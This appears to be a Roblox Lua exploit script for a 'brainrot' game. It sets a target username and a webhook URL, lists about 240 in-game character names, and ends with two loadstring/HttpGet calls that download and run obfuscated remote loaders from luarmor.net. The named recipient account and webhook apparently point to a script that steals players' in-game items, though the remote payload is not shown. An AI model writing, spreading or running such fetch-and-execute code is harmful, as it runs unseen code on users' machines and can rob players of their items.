getgenv().TARGET_USER = "Clapt_you1509"
getgenv().WEBHOOK_URL = "WEBHOOK"
getgenv().NORMAL_BRAINROTS = {
["Garama and Madundung"] = true,
["Capitano Moby"] = true,
["Burguro And Fryuro"] = true,
["Ketchuru and Musturu"] = true,
["Lavadorito Spinito"] = true,
["Ketupat Kepat"] = true,
["Tictac Sahur"] = true,
["Tang Tang Keletang"] = true,
["Money Money Puggy"] = true,
["Nuclearo Dinossauro"] = true,
["Graipuss Medussi"] = true,
["Cerberus"] = true,
["Dragon Cannelloni"] = true,
["Agarrini la Palini"] = true,
["Fragola La La La"] = true,
["Los Hotspotsitos"] = true,
["Los Bros"] = true,
["Tralaledon"] = true,
["Los Puggies"] = true,
["Los Primos"] = true,
["Los Tacoritas"] = true,
["Los Spaghettis"] = true,
["Spooky and Pumpky"] = true,
["Fragrama and Chocrama"] = true,
["La Casa Boo"] = true,
["Ketupat Bros"] = true,
["Cooki and Milki"] = true,
["Popcuru and Fizzuru"] = true,
["La Supreme Combinasion"] = true,
["Dragon Gingerini"] = true,
["Headless Horseman"] = true,
["Hydra Dragon Cannelloni"] = true,
["Celularcini Viciosini"] = true,
["La Grande Combinasion"] = true,
["Los Trios"] = true,
["La Sahur Combinasion"] = true,
["Bacuru and Egguru"] = true,
["Eviledon"] = true,
["Orcaledon"] = true,
["Money Money Reindeer"] = true,
["Los Jolly Combinasionas"] = true,
["Jolly Jolly Sahur"] = true,
["Chicleteira Noelteira"] = true,
["Bisonte Giuppitere"] = true,
["Jackorilla"] = true,
["Reindeer Tralala"] = true,
["Pumpkini Spyderini"] = true,
["Frankentteo"] = true,
["Santteo"] = true,
["Telemorte"] = true,
["Spaghetti Tualetti"] = true,
["La Secret Combinasion"] = true,
["La Food Combinasion"] = true,
["Los Spooky Combinasionas"] = true,
["Karkerkar Kurkur"] = true,
["La Ginger Sekolah"] = true,
["Rosey and Teddy"] = true,
["Los Sekolahs"] = true,
["Reinito Sleighito"] = true,
["Swaggy Bros"] = true,
["La Taco Combinasion"] = true,
["Chipso and Queso"] = true,
["La Spooky Grande"] = true,
["Tuff Toucan"] = true,
["Chillin Chili"] = true,
["Gobblino Uniciclino"] = true,
["Strawberry Elephant"] = true,
["La Extinct Grande"] = true,
["Tacorita Bicicleta"] = true,
["Quesadillo Vampiro"] = true,
["Perrito Burrito"] = true,
["La Vacca Saturno Saturnita"] = true,
["Karker Sahur"] = true,
["Bunito Bunito Spinito"] = true,
["Pirulitoita Bicicleteira"] = true,
["Bunnyman"] = true,
["Brunito Marsito"] = true,
["Guest 666"] = true,
["Mariachi Corazoni"] = true,
["Swag Soda"] = true,
["Extinct Matteo"] = true,
["Los Quesadillas"] = true,
["Spinny Hammy"] = true,
["Meowl"] = true,
["Skibidi Toilet"] = true,
["Nacho Spyder"] = true,
["Griffin"] = true,
["W or L"] = true,
["La Jolly Grande"] = true,
["La Romantic Grande"] = true,
["Festive 67"] = true,
["Los Tralaleritos"] = true,
["Las Tralaleritas"] = true,
["GOAT"] = true,
["Love Love Bear"] = true,
["Ginger Gerat"] = true,
["Mieteteira Bicicleteira"] = true,
["Trenostruzzo Turbo 4000"] = true,
["La Karkerkar Combinasion"] = true,
["La Vacca Prese Presente"] = true,
["Rocco Disco"] = true,
["Cuadramat and Pakrahmatmamat"] = true,
["25"] = true,
["Cupid Cupid Sahur"] = true,
["Ho Ho Ho Sahur"] = true,
["Chill Puppy"] = true,
["Los Sweethearts"] = true,
["Las Sis"] = true,
["Los Planitos"] = true,
["Los Candies"] = true,
["Los Mobilis"] = true,
["Zombie Tralala"] = true,
["Boatito Auratito"] = true,
["Vulturino Skeletono"] = true,
["La Cucaracha"] = true,
["Extinct Tralalero"] = true,
["La Vacca Jacko Linterino"] = true,
["Triplito Tralaleritos"] = true,
["Trickolino"] = true,
["Giftini Spyderini"] = true,
["Love Love Love Sahur"] = true,
["Please my Present"] = true,
["Santa Hotspot"] = true,
["Naughty Naughty"] = true,
["Cupid Hotspot"] = true,
["Noo my Candy"] = true,
["Noo my Present"] = true,
["Ventoliero Pavonero"] = true,
["Los Cupids"] = true,
["Celestial Pegasus"] = true,
["Antonio"] = true,
["La Lucky Grande"] = true,
["Granny"] = true,
["Cloverat Clapat"] = true,
["Dug dug dug"] = true,
["Fortunu and Cashuru"] = true,
["Gold Gold Gold"] = true,
["Snailo Clovero"] = true,
["Noo my Gold"] = true,
["Luck Luck Luck Sahur"] = true,
["La Vacca Lepre Lepreino"] = true,
["Clovkur Kurkur"] = true,
["Patteo"] = true,
["Foxini Lanternini"] = true,
["Eid Eid Eid Sahur"] = true,
["To to to Sahur"] = true,
["Chicleteirina Bicicleteirina"] = true,
["Chicliterita bicicliterita"] = true,
["Chicleteira Bicicleteira"] = true,
["Job Job Job Sahur"] = true,
["Lovin Rose"] = true,
["List List List Sahur"] = true,
["Los Combinasionas"] = true,
["Los Amigos"] = true,
["Sammyni Fattini"] = true,
["Rosetti Tualetti"] = true,
["Los 67"] = true,
["Esok Sekolah"] = true,
["Pot Hotspot"] = true,
["Guerriro Digitale"] = true,
["Los Tortus"] = true,
["Torrtuginni Dragonfrutini"] = true,
["Los Mi Gatitos"] = true,
["Los Chicleteiras"] = true,
["Yess my examine"] = true,
["Noo my examine"] = true,
["1x1x1x1"] = true,
["Los Karkeritos"] = true,
["Las Vaquitas Saturnitas"] = true,
["Los Spyderinis"] = true,
["Los Matteos"] = true,
["Los Cucarachas"] = true,
["67"] = true,
["Los Burritos"] = true,
["Rang Ring Bus"] = true,
["Arcadopus"] = true,
["Los Nooo My Hotspotsitos"] = true,
["Burrito Bandito"] = true,
["Mi Gatito"] = true,
["Pot Pumpkin"] = true,
["Quesadilla Crocodila"] = true,
["Horegini Boom"] = true,
["Nooo My Hotspot"] = true,
["Tung Tung Tung Sahur"] = true,
["Los Jobcitos"] = true,
["Coffin Tung Tung Tung Sahur"] = true,
["Blackhole Goat"] = true,
["Chachechi"] = true,
["Dul Dul Dul"] = true,
["Sammyni Spyderini"] = true,
["Chicleteira Cupideira"] = true,
["Fishino Clownino"] = true,
["Chimnino"] = true,
["Noo my Heart"] = true,
["Los 25"] = true,
["Donkeyturbo Express"] = true,
["Elefanto Frigo"] = true,
["Noo my Eggs"] = true,
["Tirilikalika Tirilikalako"] = true,
["Signore Carapace"] = true,
["Bunny and Eggy"] = true,
["Boppin Bunny"] = true,
["Hopilikalika Hopilikalako"] = true,
["Hydra Bunny"] = true,
["Cash or Card"] = true,
["Arcadragon"] = true,
["Rico Dinero"] = true,
["Pancake and Syrup"] = true,
["Quackini Snackini"] = true,
["Pretzel-Bot 3000"] = true,
["Los Kalikakiikas"] = true,
["Digi Narwhal"] = true,
["Gym Bros"] = true,
["Camero Ricero Mechero"] = true,
["Los Chillis"] = true,
["Money Money Bros"] = true,
["Duggy Bros"] = true,
["Los Hackers"] = true,
["John Pork"] = true,
["Jelly Moby"] = true,
["La Anniversary Grande"] = true,
["Kalika Bros"] = true,
["Sammyni Cakini"] = true,
["Globa Steppa"] = true,
["Dragon Aquanini"] = true,
["Coco and Mango"] = true,
["Ombrello Topolino"] = true,
["Capitano Gullini"] = true,
["Cigno Fulgoro"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/c5a067c93477b930cc4602547c6d5ffe.lua", true))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/ac1751209625e5f81cdf39f6025a5aca.lua"))()
end)
